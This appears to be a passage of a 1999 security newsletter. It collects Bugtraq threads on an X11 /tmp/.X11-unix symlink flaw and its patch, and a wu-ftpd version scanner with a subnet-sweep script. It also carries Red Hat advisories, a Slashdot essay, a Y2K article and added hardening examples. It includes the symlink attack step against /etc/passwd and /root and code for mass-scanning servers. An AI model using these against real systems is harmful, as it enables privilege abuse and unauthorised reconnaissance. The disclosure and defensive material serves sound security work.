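Review bot: `if (stat(path, &buf) != 0)` follows symlinks, so the attack this patch targets still passes when the planted link points at a directory whose bits equal `mode`, for instance /tmp/.X11-unix -> /tmp (itself 01777): S_ISDIR and the mode compare both succeed and the server then creates its socket wherever the attacker pointed it. Use lstat() so any symlink is rejected outright, and add an owner test (buf.st_uid == 0, or == geteuid()) so a real directory pre-created by another user with the right mode is refused too, since its owner can delete and re-create entries inside it. The comment "I don't know why this is done" can be replaced with the reason: mkdir() applies the process umask, so the chmod() is what actually yields 01777.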
--
Matthieu

-----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 13:55:13 +0100
From: Pavel Machek <pavel@BUG.UCW.CZ>
To: BUGTRAQ@netspace.org
Subject: not only NetBSD [was Re: X11R6 NetBSD Security Problem]

Hi!

> If this has already been brought up, you have the right to stone me to
> death, but I haven't seen it and I've searched, so here it is:
>
> I was fooling around today, and decided to rm /tmp/.X11-unix and then make
> a symbolic link from a file to /tmp/.X11-unix and then startx. So I backed
> up /etc/passwd and
> ln -s /etc/passwd /tmp/.X11-unix
> and then startx'd as a normal user account, but X wouldn't start; it
> complained and said "is not a directory". So, I made a symbolic link from
> /root to /tmp/.X11-unix, and startx'd as a normal user, and was surprised
> to have write access to /root.

I tried to reproduce on 2.2.4 linux using

XFree86 Version 3.3.2 / X Window System
(protocol Version 11, revision 0, vendor release 6300)
Release Date: March 2 1998
If the server is older than 6-12 months, or if your card is
newer
than the above date, look for a newer version before reporting
problems. (see http://www.XFree86.Org/FAQ)

. I'm not able to get write access to /etc; still, I'm able to create the
file

srwxrwxrwx 1 root root 0 Mar 26 13:48 X0=

in a previously unwritable directory. Bug, it seems. [There was some
talk about /tmp/.X11-unix directories, and I think that this problem
might very well get _worse_ with the new 3.3.3 release. Please check.]

Pavel

--
I'm really pavel@atrey.karlin.mff.cuni.cz. Pavel
Look at http://atrey.karlin.mff.cuni.cz/~pavel/ ;-).

-----------------------------------------------------------------------------

Date: Sun, 28 Mar 1999 19:01:41 -0800
From: Kevin Vajk <kvajk@RICOCHET.NET>
To: BUGTRAQ@netspace.org
Subject: Re: X11R6 NetBSD Security Problem

This patch looks pretty good. (Much better than the current situation!!!)

A few comments:

On Fri, 26 Mar 1999, Matthieu Herrb wrote:
> + if (errno == EEXIST) {
> + if (stat(path, &buf) != 0) {

This should be lstat().

> + if (S_ISDIR(buf.st_mode) && ((buf.st_mode & ~S_IFMT) == mode)) {
> + return 0;
> + }
> + }

I think you'll want to check the owner of the directory, too.

- Kevin Vajk
<kvajk@ricochet.net>
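The trans_mkdir() from the patch with both of these review points applied, as an added example in C. This is not the patch itself and not Kevin's code; unsafe_mkdir() keeps the pre-patch mkdir()+chmod() pair so the self-check can show the chmod() landing on the symlink's target, and all paths are scratch names under a temporary directory, so it runs as an ordinary user.

```c
/* safe_mkdir.c - added example, not code from the patch or the thread. */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Pre-patch xtrans sequence: results ignored, and chmod() follows a link. */
void unsafe_mkdir(const char *path, mode_t mode)
{
    mkdir(path, mode);
    chmod(path, mode);
}

/* Create `path` with `mode`, or accept what is already there only if it is
 * a real directory (not a link), owned by us or by root, with exactly
 * `mode`. Returns 0 on success, -1 with errno set otherwise. */
int safe_mkdir(const char *path, mode_t mode)
{
    struct stat st;

    if (mkdir(path, mode) == 0)
        return chmod(path, mode);          /* mkdir() is masked by umask */
    if (errno != EEXIST)
        return -1;
    if (lstat(path, &st) != 0)             /* never follow a symlink here */
        return -1;
    if (!S_ISDIR(st.st_mode)) {            /* symlink, file, socket ... */
        errno = ENOTDIR;
        return -1;
    }
    if (st.st_uid != geteuid() && st.st_uid != 0) {
        errno = EPERM;                     /* somebody else's directory */
        return -1;
    }
    if ((st.st_mode & ~S_IFMT) != mode) {
        errno = EACCES;                    /* wrong bits, e.g. no sticky */
        return -1;
    }
    return 0;
}

/* Replays the thread's attack in a scratch directory. Returns 0 when every
 * case behaves as expected, otherwise the number of the failing case. */
int self_check(void)
{
    char base[] = "/tmp/x11demo.XXXXXX";
    char victim[96], lnk[96], fresh[96];
    struct stat st;
    int rc = 0;

    if (mkdtemp(base) == NULL) {           /* fall back to the cwd */
        strcpy(base, "./x11demo.XXXXXX");
        if (mkdtemp(base) == NULL)
            return 1;
    }
    snprintf(victim, sizeof victim, "%s/etc", base);    /* stands in for /etc */
    snprintf(lnk, sizeof lnk, "%s/.X11-unix", base);     /* attacker's link */
    snprintf(fresh, sizeof fresh, "%s/.X11-unix.ok", base);

    do {
        if (mkdir(victim, 0755) || chmod(victim, 0755) || symlink(victim, lnk)) {
            rc = 2; break;
        }
        /* 3: old code, chmod() goes through the link; "etc" becomes 01777 */
        unsafe_mkdir(lnk, 01777);
        if (stat(victim, &st) || (st.st_mode & ~S_IFMT) != 01777) { rc = 3; break; }
        /* 4/5: hardened code refuses the link and leaves "etc" at 0755 */
        if (chmod(victim, 0755) || safe_mkdir(lnk, 01777) != -1 || errno != ENOTDIR) {
            rc = 4; break;
        }
        if (stat(victim, &st) || (st.st_mode & ~S_IFMT) != 0755) { rc = 5; break; }
        /* 6: first start, nothing there: created with exactly 01777 */
        if (safe_mkdir(fresh, 01777) || lstat(fresh, &st) ||
            !S_ISDIR(st.st_mode) || (st.st_mode & ~S_IFMT) != 01777) { rc = 6; break; }
        /* 7: restart with our own correct directory present: accepted */
        if (safe_mkdir(fresh, 01777)) rc = 7;
    } while (0);

    unlink(lnk); rmdir(victim); rmdir(fresh); rmdir(base);
    return rc;
}

int main(void)
{
    int rc = self_check();
    if (rc == 0)
        printf("safe_mkdir: link refused, real directory created with 01777\n");
    else
        printf("safe_mkdir: case %d failed (%s)\n", rc, strerror(errno));
    return rc;
}
```

The owner test is what closes the gap Kevin points at: in a sticky /tmp nobody but root can remove a root-owned .X11-unix, so once the server has created (or accepted) its own directory, later checks cannot be raced by swapping in a link. A directory created by another user passes the mode test but not the owner test, and is refused.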

-----------------------------------------------------------------------------

Date: Wed, 31 Mar 1999 11:12:52 -0600
From: Patrick J. Volkerding <gonzo@RRNET.COM>
To: BUGTRAQ@netspace.org
Subject: XFree86 security problem

On Mon, 29 Mar 1999, Domas Mituzas wrote:
> why is RedHat delaying release of this package
> as it smells like root takeover (it was too easy
> to change /etc/ and /etc/passwd permissions to
> something neat).
>
> [...]
>
> This is cross-platform bug, as I found it in
> all OS that run XFree86 3.3.3 server. As far as
> I know it is on every Linux distribution (especially
> newest ones) and BSD's.

Before flying off the handle at Red Hat, you might consider that quite
possibly they aren't vulnerable to this problem. As far as I can tell, if
the system ships with a /tmp/.X11-unix/ directory already in place, and
none of the system scripts delete it, then there's no security problem
since nobody can put a rogue symlink at that location in /tmp.

I know Slackware Linux isn't vulnerable to this problem, and never was,
and I don't think we're the only ones to ship a Linux OS that provides a
pre-existing /tmp/.X11-unix/.

--
Patrick J. Volkerding
Slackware Linux Project


@HWA

31.0 Yet another wu-ftpd scanner by 03m0s1s
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 24 Mar 1999 06:29:20 PST
From: baku@EXCITE.COM
To: BUGTRAQ@netspace.org
Subject: WUftp scanner

Hi, aleph1
this is a quick and dirty scanner I wrote to look for vulnerable wu-ftpd
servers.
<---------wuscan.c------>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define FTPPORT 21
#define VERBOSE 1

int
main (int argc, char **argv)
{
  struct hostent *hp;
  struct in_addr addr;
  struct sockaddr_in s;
  char buf[280];
  int p, n;

  if (argc == 1)
    {
      printf ("WUftpd Buffer overflow scanner.\n");
      printf ("Written by 03m0s1s 3/19/1999\n");
      printf ("Usage: %s <hostname>\n", argv[0]);
      exit (1);
    }

  hp = gethostbyname (argv[1]);
  if (!hp) exit (1);

  memcpy (&addr, hp->h_addr, sizeof (struct in_addr));
  memset (&s, 0, sizeof (s));
  s.sin_family = AF_INET;
  s.sin_port = htons (FTPPORT);
  s.sin_addr = addr;

  p = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
  if (p < 0 || connect (p, (struct sockaddr *) &s, sizeof (s)) < 0)
    {
      printf ("%s: connect failed.\n", inet_ntoa (addr));
      exit (1);
    }

  alarm (4);                              /* Time out after 4 seconds (no handler: SIGALRM kills us) */
  n = read (p, buf, sizeof (buf) - 1);    /* Grab the banner */
  if (n < 0) n = 0;
  buf[n] = 0;                             /* read() does not NUL-terminate */

  if (strstr (buf, "Version wu-2.4.2-academ[BETA-18](1)"))
    {
      if (strstr (buf, "Mon Jan 18 19:19:31 EST 1999"))
        printf ("%s is patched.\n", inet_ntoa (addr));
      else
        printf ("%s is vulnerable.\n", inet_ntoa (addr));
      /* It must be the "Mon Aug 3 19:17:20 EDT 1998) ready." banner. */
    }
  else
    printf ("%s does not look BETA-18.\n", inet_ntoa (addr));

  if (VERBOSE)
    printf ("%s\n\n", buf);
  write (p, "bye\n", 4);   /* We just want the banner, no need to stick around. */
  close (p);
  return 0;
}
<------end wuscan.c---------->
<-------wuss perl script----->
#!/usr/bin/perl -w
# Automate a class C subnet scan; it doesn't check to see if the host is up
# (could add a ping routine in here).
# Syntax: ./wuss [aaa.bbb.ccc]

$net = $ARGV[0];
die "Syntax: $0 aaa.bbb.ccc\n" unless defined $net;
$START = 1;
$END = 254;

while ($START <= $END) {
    $HOST = "$net.$START";
    print `./wuscan $HOST`;
    $START = $START + 1;
}
<------wuss--------->

-----------------------------------------------------------------------------

Date: Thu, 25 Mar 1999 22:25:39 -0500
From: Gregory A Lundberg <lundberg+wuftpd@VR.NET>
To: BUGTRAQ@netspace.org
Subject: Re: WUftp scanner

On Wed, 24 Mar 1999 baku@EXCITE.COM wrote:

> if (strstr (buf, "Version wu-2.4.2-academ[BETA-18](1)"))

No. Way too strict. You'll miss people who touched ftpcmd.y and
recompiled:
Version wu-2.4.2-academ[BETA-18](2)
And you'll miss earlier versions which are vulnerable, say:
Version wu-2.4.2-academ[BETA-12]
And you'll miss derivatives which are vulnerable, like one of mine:
Version wu-2.4.2-academ[BETA-18-VR6]

> {
> if (strstr (buf, "Mon Jan 18 19:19:31 EST 1999"))
> printf ("%s is patched.\n", inet_ntoa (addr));

No. That's the date and time _you_ compiled the daemon. The target
machine was probably compiled some other time.

--

Gregory A Lundberg Senior Partner, VRnet Company
1441 Elmdale Drive lundberg+wuftpd@vr.net
Kettering, OH 45409-1615 USA 1-800-809-2195

-----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 10:05:54 -0700
From: Scott Stone <sstone@TURBOLINUX.COM>
To: BUGTRAQ@netspace.org
Subject: Re: WUftp scanner

On Wed, 24 Mar 1999 baku@EXCITE.COM wrote:

> Hi, aleph1
> this is a quick and dirty scanner I wrote to look for vulnerable wu-ftpd
> servers.

Sorry, but this is kind of dumb. This will check to make sure that you're
using a specific build of wu-ftpd... but what if you rebuilt it yourself?
then the timestamp will be different. The timestamp reflects the
time/date/zone in which this particular server binary was COMPILED. So
basically all this program tells me is if I'm using Redhat's prebuilt
wu-ftpd binary, right? My TurboLinux wu-ftpd RPM is correctly patched,
but it will say that it's 19:19:11 PST 1999 since that's when I built it,
and I built it in California.
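A banner check done the way the two replies say it should be, as an added example in C (not the scanner above, and not code from Gregory or Scott). It matches the whole wu-2.4.2-academ[BETA-N...] family, so BETA-12, BETA-18(2) and BETA-18-VR6 are all reported, and it ignores the build timestamp entirely, since that only records when that particular binary was compiled. It therefore never claims "patched": a banner in the family is a candidate to verify by hand. The greetings in main() are constructed samples.

```c
/* wu_banner.c - added example, not code from the original posts. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum wu_class {
    WU_NOT_WU = 0,           /* no "Version wu-" at all */
    WU_OTHER_WU = 1,         /* wu-ftpd, but not the 2.4.2-academ family */
    WU_ACADEM_CANDIDATE = 2  /* 2.4.2-academ[BETA-N...]: verify by hand */
};

struct wu_info {
    enum wu_class cls;
    int beta;         /* N from [BETA-N...], 0 if absent */
    int build;        /* (n) rebuild counter after the bracket, 0 if absent */
    char suffix[32];  /* derivative tag between BETA-N and ']', e.g. "-VR6" */
};

/* Parse one greeting line. Fills *info and returns info->cls. */
enum wu_class parse_wu_banner(const char *banner, struct wu_info *info)
{
    static const char family[] = "wu-2.4.2-academ[BETA-";
    const char *p, *rb;
    char *end;
    size_t len;

    memset(info, 0, sizeof *info);

    p = strstr(banner, "Version wu-");
    if (p == NULL)
        return info->cls = WU_NOT_WU;
    p += strlen("Version ");
    info->cls = WU_OTHER_WU;

    /* Family match on the prefix only: the exact suffix is not the point. */
    if (strncmp(p, family, sizeof family - 1) != 0)
        return info->cls;
    p += sizeof family - 1;

    info->beta = (int)strtol(p, &end, 10);
    if (end == p || info->beta <= 0)
        return info->cls;                  /* malformed: stay conservative */

    rb = strchr(end, ']');
    if (rb == NULL)
        return info->cls;
    len = (size_t)(rb - end);
    if (len >= sizeof info->suffix)
        len = sizeof info->suffix - 1;
    memcpy(info->suffix, end, len);
    info->suffix[len] = '\0';

    if (rb[1] == '(')                      /* "(2)": ftpcmd.y touched, rebuilt */
        info->build = atoi(rb + 2);

    return info->cls = WU_ACADEM_CANDIDATE;
}

int main(void)
{
    /* Constructed banners covering the cases raised in the replies. */
    const char *samples[] = {
        "220 ftp FTP server (Version wu-2.4.2-academ[BETA-18](1) Mon Aug 3 19:17:20 EDT 1998) ready.",
        "220 ftp FTP server (Version wu-2.4.2-academ[BETA-18](2) Tue Mar 23 10:00:00 PST 1999) ready.",
        "220 ftp FTP server (Version wu-2.4.2-academ[BETA-12] Fri Jun 5 08:00:00 CDT 1998) ready.",
        "220 ftp FTP server (Version wu-2.4.2-academ[BETA-18-VR6](1) Sat Jan 9 12:00:00 EST 1999) ready.",
        "220 ftp FTP server (Version wu-2.5.0(1) Mon Apr 5 00:00:00 EST 1999) ready.",
        "220 ProFTPD 1.2.0pre1 Server ready.",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        struct wu_info info;
        parse_wu_banner(samples[i], &info);
        if (info.cls == WU_ACADEM_CANDIDATE)
            printf("candidate: BETA-%d%s build %d - banner cannot prove a patch, check by hand\n",
                   info.beta, info.suffix, info.build);
        else
            printf("%s\n", info.cls == WU_OTHER_WU ? "wu-ftpd, not 2.4.2-academ" : "not wu-ftpd");
    }
    return 0;
}
```

The parsed pieces are kept separate (BETA number, derivative suffix, rebuild counter) so a scanner can report them instead of collapsing everything into one exact-string match; the only thing a banner can tell you is which code base the daemon came from, not whether its owner applied the fix.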


@HWA


32.0 RedHat linux security advisories
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

- -----BEGIN PGP SIGNED MESSAGE-----


Security vulnerabilities have been identified in various packages that
ship with Red Hat Linux.


Red Hat would like to thank the members of the BUGTRAQ mailing list,
the members of the Linux Security Audit team, and others. All users
of Red Hat Linux are encouraged to upgrade to the new packages
immediately. As always, these packages have been signed with the
Red Hat PGP key.


mutt, pine:
- - -----------
A problem in the MIME handling code could allow a remote user
to execute certain commands on a local system.


Red Hat Linux 5.2
- - -----------------
alpha: rpm -Uvh ftp://updates.redhat.com/5.2/alpha/mutt-0.95.4us-0.alpha.rpm
rpm -Uvh ftp://updates.redhat.com/5.2/alpha/pine-4.10-1.alpha.rpm
i386: rpm -Uvh ftp://updates.redhat.com/5.2/i386/mutt-0.95.4us-0.i386.rpm
rpm -Uvh ftp://updates.redhat.com/5.2/i386/pine-4.10-1.i386.rpm
sparc: rpm -Uvh ftp://updates.redhat.com/5.2/sparc/mutt-0.95.4us-0.sparc.rpm
rpm -Uvh ftp://updates.redhat.com/5.2/sparc/pine-4.10-1.sparc.rpm
source: rpm -Uvh ftp://updates.redhat.com/5.2/SRPMS/mutt-0.95.4us-0.src.rpm
rpm -Uvh ftp://updates.redhat.com/5.2/SRPMS/pine-4.10-1.src.rpm


Red Hat Linux 5.1
- - -----------------
alpha: rpm -Uvh ftp://updates.redhat.com/5.1/alpha/mutt-0.95.4us-0.alpha.rpm
rpm -Uvh ftp://updates.redhat.com/5.1/alpha/pine-3.96-8.1.alpha.rpm
i386: rpm -Uvh ftp://updates.redhat.com/5.1/i386/mutt-0.95.4us-0.i386.rpm
rpm -Uvh ftp://updates.redhat.com/5.1/i386/pine-3.96-8.1.i386.rpm
sparc: rpm -Uvh ftp://updates.redhat.com/5.1/sparc/mutt-0.95.4us-0.sparc.rpm
rpm -Uvh ftp://updates.redhat.com/5.1/sparc/pine-3.96-8.1.sparc.rpm
source: rpm -Uvh ftp://updates.redhat.com/5.1/SRPMS/mutt-0.95.4us-0.src.rpm
rpm -Uvh ftp://updates.redhat.com/5.1/SRPMS/pine-3.96-8.1.src.rpm


Red Hat Linux 5.0
- - -----------------
alpha: rpm -Uvh ftp://updates.redhat.com/5.0/alpha/mutt-0.95.4us-0.alpha.rpm
rpm -Uvh ftp://updates.redhat.com/5.0/alpha/pine-3.96-7.1.alpha.rpm
i386: rpm -Uvh ftp://updates.redhat.com/5.0/i386/mutt-0.95.4us-0.i386.rpm
rpm -Uvh ftp://updates.redhat.com/5.0/i386/pine-3.96-7.1.i386.rpm
source: rpm -Uvh ftp://updates.redhat.com/5.0/SRPMS/mutt-0.95.4us-0.src.rpm
rpm -Uvh ftp://updates.redhat.com/5.0/SRPMS/pine-3.96-7.1.src.rpm


Red Hat Linux 4.2
- - -----------------
alpha: rpm -Uvh ftp://updates.redhat.com/4.2/alpha/pine-3.96-7.0.alpha.rpm
i386: rpm -Uvh ftp://updates.redhat.com/4.2/i386/pine-3.96-7.0.i386.rpm
sparc: rpm -Uvh ftp://updates.redhat.com/4.2/sparc/pine-3.96-7.0.sparc.rpm
source: rpm -Uvh ftp://updates.redhat.com/4.2/SRPMS/pine-3.96-7.0.src.rpm


(Mutt was not shipped with Red Hat Linux 4.2)


sysklogd
- - --------
An overflow in the parsing code could lead to crashes of the system
logger.


Red Hat Linux 5.0,5.1,5.2:
- - --------------------------
alpha: rpm -Uvh ftp://updates.redhat.com/5.2/alpha/sysklogd-1.3.31-0.5.alpha.rpm
i386: rpm -Uvh ftp://updates.redhat.com/5.2/i386/sysklogd-1.3.31-0.5.i386.rpm
sparc: rpm -Uvh ftp://updates.redhat.com/5.2/sparc/sysklogd-1.3.31-0.5.sparc.rpm
source: rpm -Uvh ftp://updates.redhat.com/5.2/SRPMS/sysklogd-1.3.31-0.5.src.rpm


Red Hat Linux 4.2:
- - ------------------
alpha: rpm -Uvh ftp://updates.redhat.com/4.2/alpha/sysklogd-1.3.31-0.0.alpha.rpm
i386: rpm -Uvh ftp://updates.redhat.com/4.2/i386/sysklogd-1.3.31-0.0.i386.rpm
sparc: rpm -Uvh ftp://updates.redhat.com/4.2/sparc/sysklogd-1.3.31-0.0.sparc.rpm
source: rpm -Uvh ftp://updates.redhat.com/4.2/SRPMS/sysklogd-1.3.31-0.0.src.rpm


zgv
- - ---
Local users could gain root access.


Red Hat Linux 5.2:
- - ------------------
i386: rpm -Uvh ftp://updates.redhat.com/5.2/i386/zgv-3.0-7.i386.rpm
source: rpm -Uvh ftp://updates.redhat.com/5.2/SRPMS/zgv-3.0-7.src.rpm


Red Hat Linux 5.1:
- - ------------------
i386: rpm -Uvh ftp://updates.redhat.com/5.1/i386/zgv-3.0-5.1.i386.rpm
source: rpm -Uvh ftp://updates.redhat.com/5.1/SRPMS/zgv-3.0-5.1.src.rpm


Red Hat Linux 5.0:
- - ------------------
i386: rpm -Uvh ftp://updates.redhat.com/5.0/i386/zgv-3.0-1.5.0.i386.rpm
source: rpm -Uvh ftp://updates.redhat.com/5.0/SRPMS/zgv-3.0-1.5.0.src.rpm


Red Hat Linux 4.2:
- - ------------------
i386: rpm -Uvh ftp://updates.redhat.com/4.2/i386/zgv-3.0-1.4.2.i386.rpm
source: rpm -Uvh ftp://updates.redhat.com/4.2/SRPMS/zgv-3.0-1.4.2.src.rpm


Cristian
- - --
- - ----------------------------------------------------------------------
Cristian Gafton -- gafton@redhat.com -- Red Hat Software, Inc.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
UNIX is user friendly. It's just selective about who its friends are.

@HWA


33.0 The Suburbanization of Slashdot an internet institution by Pasty Drone..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


The Suburbanization of Slashdot
by Pasty Drone <a href="mailto:pastydrone@newstrolls.com">email</a><br>


So I surfed into Slashdot last week, expecting the usual motley group of posters,
flamers and idiots that I have come to love watching interact in the great theater
that is Threads. But as I looked around, I became aware that gone were the weeds of
the Meepts!, the empty, unpainted houses of the Firsts!, and the nefarious crackdens
of the flamers...all around me was a chilling non-organic robot-like civility coming
from posts that said things like "I like Jon" and "Slashdot is great". The posts were
smooth and straight and as boring as a well-kept lawn. The unpleasant, the idiotic,
the taboo had vanished from my screen.


Slashdot <a href="http://www.slashdot.org/article.pl?sid=99/03/23/1058204"> had moved
to the suburbs. </a> And why should <a href="http://www.newstrolls.com/news/dev/whois.htm">
I, the CEO of NewsTrolls</a> care what happens on Slashdot? It's Rob's site he can do with
it what he wants. And yet...and yet...

I suppose to understand my feelings about Slashdot I have to explain NewsTrolls' relationship
with them. When we started NewsTrolls in September of 1998, we were already well-established
as daily readers of Slashdot. Even before our beginning as our own site, I would regularly
link to Slashdot articles in the daily trolling I did in HotWired's old Media Rant Threads.
When NewsTrolls, after collective debate via posts, decided to have advertising on the site, we at
<a href="http://www.newstrolls.com/news/dev/troll1123.htm">first only ran with Slashdot's banner
</a> as a tribute to their work. At that time Slashdot was also running our NewsTrolls banner.

Another similarity we share is that when NewsTrolls started out <a href="http://www.newstrolls.com/news/dev/guest/archive.htm">
Jon Katz contributed articles to us </a>, but after a while he moved over to publish on Slashdot.
I can't really fault him for moving...as a writer whose persona is dependent on the number of
Netizens who read and like him, it made business sense to go where the numbers were bigger.
And Slashdot is definitely a much larger site than NewsTrolls.

Running a site dedicated to free speech with a Threads board that can be vociferous on a good
day and downright cruel on a bad one (myself included) is a giant pain in the ass. I understand
exactly (albeit on a smaller scale) what Rob's frustrations are. How do you keep the quality
up and the spam down?

In Slashdot's case, Rob has decided to appoint moderators to rank posts and then let users
customize their viewing options so to allow them to choose which posts to view. Sounds reasonable,
but there are two major problems.

1. The default is set at 0 for new users or users not logged in. Therefore, no posts that have been
ranked below 0 are seen. While the option is there for the readers to change to view all posts,
anyone who has been on the Internet more than 5 years knows we are constantly dealing with newbies
who are lucky to navigate a page, let alone feel secure enough to change options. New users who are
not computer-savvy stick with defaults.
2. The moderators who number over 400 were chosen by a smaller group of under 30 who found their posts
to be useful and informative. These 400+ now rank the rest of the posts. The hope is that the
moderators will spend more time grading up and only grading down the non-useful posts. Unfortunately,
posters who express dissenting opinions in non-traditional manners are being downgraded, too.

When the moderation article first came out, <a href="http://www.newstrolls.com/news/threads/thread.cgi?436,0,,1">
I started a thread to discuss the ramifications of moderating threads.</a>
Regulars of NewsTrolls and readers from /. have been debating the issue with many excellent points.
Now here's my half-rant/half-loveletter on Slashdot...
To me, what I have loved about Slashdot is that it has epitomized the bizarre bazaar of open source.
Scriptkiddies, geeks, phreaks, hackers, crackers, wannabes, sysadmins, developers, suits, all hollering
at the story presented, at each other, at the world in general sometimes. Maybe what others call noise, I
call music. I loved to see how a post on KDE could elicit useful links, suggestions, inside scoops,
clueless questions, and loud dissenters from the GNOME crowd. Or how posters would take sides on Perens
or Raymond with the bloodthirst of gamblers at a cockfight. Or the hushed awe, meaningful whispers, and
conspiracy theories that flew whenever Transmeta was mentioned. Or the joyful solidarity as a new Linux
kernel was posted. To me, the organic twists and turns a thread would take was just as enlightening as
the articles to which they were attached. The grammar flames were like a call-and-response between posters
who had obviously gone through the same motions before. The glorious meept! nonsense posts were like throwing
in moments straight out of Theater of the Absurd. The First Posts! were crows of delight that said:
"I'm here!, You can see me!". The whole cacophonous din was like walking down Times Square in rush hour
when Hansen is in the 2nd Floor MTV studios. It was ALIVE! It had SOUL!
Moderation changes all of that. It cleans up Times Square faster than Disney with a fistful of Giuliani
tax incentives. It moves Slashdot to the suburbs. Now posts are judged worthy or not-worthy. Instead
of simply ignoring idiots, they are now branded with a negative sign. And worst of all, dissenting
opinions, some with good points, are being downgraded as well. If you experiment with the moderation
on 2 or 3, you get all these earnest well-written posts that remind me of church ladies' conversation
at a quilting bee. Ugh! And if you view the posts by ranked order, the organic flow is cut to bits...
no longer can you see how one point flows into another and how you got from A to Z. Is this progress?
Is this what web discussion is about? No matter how much advertisers wish it so, you cannot pin down a
posting community. You can't expect them to all know English in the first place and you certainly can't
expect them to be of the same mind when they are of every age and experience level in the book. Why then
try to moderate them? Why are so many people congratulating Slashdot on cutting down on "the noise"?
Why is it judged "noise" at all? I don't see it as noise...I may skim it instead of reading it, but I
can't tell you how many times a well-placed, off-topic post has made my day. I don't want to read only
the standard opinion on any topic and IMO that is the big pitfall with moderation. I want ALL the sights
and smells of the bazaar, Times Square, the big city...from garbage to haute cuisine...not merely the
blandness of a made-to-order, frozen-dinner, must-see-TV suburb. Why? Because in my case, it is the
posters who have nailed my mistakes, cursed me a blue streak, and even made me cry from whom I have
learned the most. They have forced me to re-evaluate my opinions and restate my thoughts. They have
taught me and by their hard words helped me to grow. And, they have become friends.
So what should Slashdot do instead? A few ideas:
1. Set the default to all-posts-viewed. If I'm not logged in or am new, let me see Slashdot in all its
raging glory and then let me decide if I want to choose moderation.
2. I can't prove this might help with the "noise", but I think having a Threads area as opposed to posts
being on the same page as the article might naturally eliminate some problems. That way, people who
really felt inspired to say something would click on a link at the end of the article to a thread
discussing the issue at hand. There wouldn't be the vanity of being "seen" so much, which leads to
First Posts! and the like.
3. If you must moderate, have a time limit on moderation, random selection of moderators, and a constant
turnover on who is moderating among your registered users. This will eliminate some of the cronyism that
has already occurred due to the 400+ being selected by the original group.
4. Learn to love the flames. Certainly don't worry about Katz flames-- we gave him total hell on HotWired.
It's a tradition. Flames are instructional, even if you don't like what they're teaching you.
5. Many posters seem to flame when there are articles that they don't feel are hard-core Slashdot. So how
about a separate page for those articles? The front page would be all the "News for Nerds" and you could
have a link to something like "The Rest of the World" which would be the same setup but with different
articles (and a place for Katz).

When it's all said and done, if Rob wants to morph Slashdot threads into a university-like moderated discussion, it's his call. Either way, I'll still be reading Slashdot. But to me, what makes Slashdot great is its many passionate voices, not a few well-written posts.
Who needs the suburbs?...Give me that funk!


@HWA


34.0 Canada rolls into the fiscal new millennium with a steady eye on its govt mainframes....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Canada Rolls into Fiscal 2000
by Matt Friedman

9:30 a.m. 1.Apr.99.PST
MONTREAL -- Civil servants here were watching their computer monitors closely Thursday.

Canada's federal government began its fiscal year today, marking the first time such a year will include dates in the
year 2000. If Ottawa is going to be bitten by the millennium bug, this is when the problems might start showing up.

The government says it's ready.

"April 1 is hardly a surprise for us," said Paul Walsh, a spokesman for the federal Department of Public Works and
Government Services.

"We have been doing compliance testing for the beginning of the fiscal year and for all of the other key days leading up
to and after January 1, 2000."


Those trouble dates include New Year's Day itself, the start of the new fiscal year, and 9 September 1999 (the ninth
day of the ninth month of 1999). Ottawa has also tested for 7 April 1999 -- the 99th day of 1999 -- and for 29
February and 1 March 2000. The first year of the 21st century is a leap year, while the first year of the 20th century
was not.

In any case, Canada will survive. If Y2K problems do arise, they will surface in financial reporting and management
systems. Department and program managers may not have correct budget information, or may not be able to allocate
funds. Walsh says that won't happen.

"We have tested all government-wide, mission-critical systems," Walsh said. "We ran the systems on mainframes,
simulating different dates. And we tested all of the key dates, so we know that 1 April or any other date isn't an issue.
Any problems would already have shown up in testing."


Joe Boivin, president of the Ottawa-based Global Millennium Foundation, has been critical of the Canadian government's
Y2K efforts. However, he says that, for the most part, Ottawa has its house in order.

"The truth is, that anyone can see if there's going to be a problem by advancing dates in a spreadsheet," Boivin said.
"It's not a difficult testing issue, and Ottawa has been testing."

"The truth is that the government is one of the world leaders on this."

The federal body that has been auditing the compliance process agrees. Though it is cautiously optimistic, the Office
of the Auditor General (OAG) warns that there could still be problems.

"No one would claim that everything is all right at this point," said Nancy Cheng, a principal with the OAG's Audit
Operations Branch. "The government is hoping to have everything done by June. It has taken the issue seriously, and
there has been tremendous progress, but there will be glitches. It's just not clear whether they'll be visible to the
public."


However, for all the planning and testing, Boivin remains skeptical that the Canadian government has covered all the
bases. Some things are just going to fall through the cracks, he said.

"The government report has high completion numbers, but they still haven't implemented compliance in a production
environment," Boivin said.

"You may have 90 percent of the job done, but it's the last 10 percent, when you get into the real-time world versus
hopeful thinking and careful planning, that will give you problems. Anyone who has ever worked in a production
environment can tell you that."


The biggest problems could stem from what Cheng called "interface issues," when government departments interact
with business partners or with the provincial governments, many of which are far behind Ottawa in their compliance
efforts.

"The government has a lot of partners in the public and private sectors, and a lot of them are at different stages of
compliance," she said. "That makes it difficult to know for sure how prepared we really are."

"If Canada has an Achilles' heel, it's that we have a lot of people doing things at various levels of government and in
the private sector, but we don't have a national Y2K coordinator," Boivin says. "Even if Ottawa is in good shape, there
are the provinces -- and the municipalities aren't even at the 50 percent mark in compliance implementation and
testing."


The Treasury Board of Canada's monthly Y2K progress report will be available on the board's Web site. The auditor
general plans a third audit of federal Y2K readiness in June. This time, however, Cheng says that her department will
have a special focus on federal contingency plans.


@HWA


